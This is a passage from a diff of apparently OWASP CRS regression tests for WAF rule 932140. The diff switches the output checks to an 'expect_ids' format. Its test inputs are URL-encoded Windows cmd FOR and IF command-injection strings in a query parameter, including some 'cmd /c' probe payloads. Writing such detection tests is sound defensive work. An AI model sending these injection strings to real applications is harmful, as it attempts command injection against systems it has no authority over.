"/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 45 desc: imported test stages: @@ -678,7 +722,8 @@ tests: uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 46 desc: imported test stages: 
@@ -693,7 +738,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 47 desc: imported test stages: @@ -708,7 +754,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 48 desc: imported test stages: @@ -723,7 +770,8 @@ tests: uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 49 desc: imported test stages: @@ -738,7 +786,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 50 desc: imported test stages: @@ -753,7 +802,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 51 desc: imported test stages: @@ -768,7 +818,8 @@ tests: uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 52 desc: imported test stages: @@ -783,7 +834,8 @@ tests: uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 53 desc: imported test stages: 
@@ -798,7 +850,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 54 desc: imported test stages: @@ -813,7 +866,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 55 desc: imported test stages: @@ -828,7 +882,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 56 desc: imported test stages: @@ -843,7 +898,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 57 desc: imported test stages: @@ -858,7 +914,8 @@ tests: uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 58 desc: imported test stages: @@ -873,7 +930,8 @@ tests: uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 59 desc: imported test stages: 
@@ -888,7 +946,8 @@ tests: uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 60 desc: imported test stages: @@ -903,7 +962,8 @@ tests: uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 61 desc: imported test stages: @@ -918,7 +978,8 @@ tests: uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 62 desc: imported test stages: @@ -933,7 +994,8 @@ tests: uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 63 desc: imported test stages: @@ -948,7 +1010,8 @@ tests: uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 64 desc: imported test stages: @@ -963,7 +1026,8 @@ tests: uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 65 desc: imported test stages: @@ -978,7 +1042,8 @@ tests: uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 66 desc: imported test stages: @@ -993,7 +1058,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 67 desc: imported test stages: 
@@ -1008,7 +1074,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 68 desc: imported test stages: @@ -1023,7 +1090,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 69 desc: imported test stages: @@ -1038,7 +1106,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 70 desc: imported test stages: @@ -1053,7 +1122,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 71 desc: imported test stages: @@ -1068,7 +1138,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 72 desc: imported test stages: @@ -1083,7 +1154,8 @@ tests: uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 73 desc: imported test stages: @@ -1098,7 +1170,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 74 desc: imported test stages: @@ -1113,7 +1186,8 @@ tests: uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 75 desc: imported test stages: @@ -1128,7 +1202,8 @@ tests: uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 76 desc: imported test stages: 
@@ -1143,7 +1218,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 77 desc: imported test stages: @@ -1158,7 +1234,8 @@ tests: uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 78 desc: imported test stages: @@ -1173,7 +1250,8 @@ tests: uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 79 desc: imported test stages: @@ -1188,7 +1266,8 @@ tests: uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 80 desc: imported test stages: @@ -1203,7 +1282,8 @@ tests: uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 81 desc: imported test stages: @@ -1218,7 +1298,8 @@ tests: uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 82 desc: imported test stages: @@ -1233,7 +1314,8 @@ tests: uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 83 desc: imported test stages: @@ -1248,7 +1330,8 @@ tests: uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 84 desc: imported test stages: @@ -1263,7 +1346,8 @@ tests: uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 85 desc: imported test stages: 
@@ -1278,7 +1362,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 86 desc: imported test stages: @@ -1293,7 +1378,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 87 desc: imported test stages: @@ -1308,7 +1394,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 88 desc: imported test stages: @@ -1323,7 +1410,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 89 desc: imported test stages: @@ -1338,7 +1426,8 @@ tests: uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 90 desc: imported test stages: @@ -1353,7 +1442,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 91 desc: imported test stages: @@ -1368,7 +1458,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 92 desc: imported test stages: @@ -1383,7 +1474,8 @@ tests: uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 93 desc: imported test stages: 
@@ -1398,7 +1490,8 @@ tests: uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 94 desc: imported test stages: @@ -1413,7 +1506,8 @@ tests: uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 95 desc: imported test stages: @@ -1428,7 +1522,8 @@ tests: uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 96 desc: imported test stages: @@ -1443,7 +1538,8 @@ tests: uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 97 desc: imported test stages: @@ -1458,7 +1554,8 @@ tests: uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 98 desc: imported test stages: @@ -1473,7 +1570,8 @@ tests: uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 99 desc: imported test stages: @@ -1488,7 +1586,8 @@ tests: uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 100 desc: imported test stages: @@ -1503,7 +1602,8 @@ tests: uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 101 desc: imported test stages: 
@@ -1518,7 +1618,8 @@ tests: uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 102 desc: imported test stages: @@ -1533,7 +1634,8 @@ tests: uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 103 desc: imported test stages: @@ -1548,7 +1650,8 @@ tests: uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 104 desc: imported test stages: @@ -1563,7 +1666,8 @@ tests: uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 105 desc: imported test stages: @@ -1578,7 +1682,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 106 desc: imported test stages: @@ -1593,7 +1698,8 @@ tests: uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 107 desc: imported test stages: @@ -1608,7 +1714,8 @@ tests: uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 108 desc: imported test stages: @@ -1623,7 +1730,8 @@ tests: uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 109 desc: imported test stages: 
@@ -1638,7 +1746,8 @@ tests: uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 110 desc: imported test stages: @@ -1653,7 +1762,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 111 desc: imported test stages: @@ -1668,7 +1778,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 112 desc: imported test stages: @@ -1683,7 +1794,8 @@ tests: uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 113 desc: imported test stages: @@ -1698,7 +1810,8 @@ tests: uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 114 desc: imported test stages: @@ -1713,7 +1826,8 @@ tests: uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 115 desc: imported test stages: @@ -1728,7 +1842,8 @@ tests: uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 116 desc: imported test stages: @@ -1743,7 +1858,8 @@ tests: uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 117 desc: imported test stages: 
@@ -1758,7 +1874,8 @@ tests: uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 118 desc: imported test stages: @@ -1773,7 +1890,8 @@ tests: uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 119 desc: imported test stages: @@ -1788,7 +1906,8 @@ tests: uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 120 desc: imported test stages: @@ -1803,7 +1922,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 121 desc: imported test stages: @@ -1818,7 +1938,8 @@ tests: uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 122 desc: imported test stages: @@ -1833,7 +1954,8 @@ tests: uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 123 desc: imported test stages: @@ -1848,7 +1970,8 @@ tests: uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 124 desc: imported test stages: @@ -1863,7 +1986,8 @@ tests: uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 125 desc: imported test stages: @@ -1878,7 +2002,8 @@ tests: uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 126 desc: imported test stages: 
@@ -1893,7 +2018,8 @@ tests: uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 127 desc: imported test stages: @@ -1908,7 +2034,8 @@ tests: uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 128 desc: imported test stages: @@ -1923,7 +2050,8 @@ tests: uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 129 desc: imported test stages: @@ -1938,7 +2066,8 @@ tests: uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 130 desc: imported test stages: @@ -1953,7 +2082,8 @@ tests: uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 131 desc: imported test stages: @@ -1968,7 +2098,8 @@ tests: uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 132 desc: imported test stages: @@ -1983,7 +2114,8 @@ tests: uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 133 desc: imported test stages: @@ -1998,7 +2130,8 @@ tests: uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 134 desc: imported test stages: @@ -2013,7 +2146,8 @@ tests: uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 135 desc: imported test stages: 
@@ -2028,7 +2162,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 136 desc: imported test stages: @@ -2043,7 +2178,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 137 desc: imported test stages: @@ -2058,7 +2194,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 138 desc: imported test stages: @@ -2073,7 +2210,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 139 desc: imported test stages: @@ -2088,7 +2226,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 140 desc: imported test stages: @@ -2103,7 +2242,8 @@ tests: uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 141 desc: imported test stages: @@ -2118,7 +2258,8 @@ tests: uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 142 desc: imported test stages: @@ -2133,7 +2274,8 @@ tests: uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 143 desc: imported test stages: 
@@ -2148,7 +2290,8 @@ tests: uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 144 desc: imported test stages: @@ -2163,7 +2306,8 @@ tests: uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 145 desc: imported test stages: @@ -2178,7 +2322,8 @@ tests: uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 146 desc: imported test stages: @@ -2193,7 +2338,8 @@ tests: uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 147 desc: imported test stages: @@ -2208,7 +2354,8 @@ tests: uri: "/get?foo=if+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 148 desc: imported test stages: @@ -2223,7 +2370,8 @@ tests: uri: "/get?foo=if%2Fi+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 149 desc: imported test stages: @@ -2238,7 +2386,8 @@ tests: uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 150 desc: imported test stages: 
@@ -2253,7 +2402,8 @@ tests: uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 151 desc: imported test stages: @@ -2268,7 +2418,8 @@ tests: uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 152 desc: imported test stages: @@ -2283,7 +2434,8 @@ tests: uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 153 desc: imported test stages: @@ -2298,7 +2450,8 @@ tests: uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 154 desc: imported test stages: @@ -2313,7 +2466,8 @@ tests: uri: "/get?foo=ifq+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 155 desc: imported test stages: @@ -2328,7 +2482,8 @@ tests: uri: "/get?foo=iffoo+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 156 desc: imported test stages: @@ -2343,7 +2498,8 @@ tests: uri: "/get?foo=if3+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 157 desc: imported test stages: @@ -2358,7 +2514,8 @@ tests: uri: "/get?foo=if3q+a%3D%3Db+foo" version: HTTP/1.0 output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] - test_id: 158 desc: | FP when using `t:urlDecodeUni`. @@ -2379,4 +2536,5 @@ tests: version: HTTP/1.0 data: <?xml version="1.0" 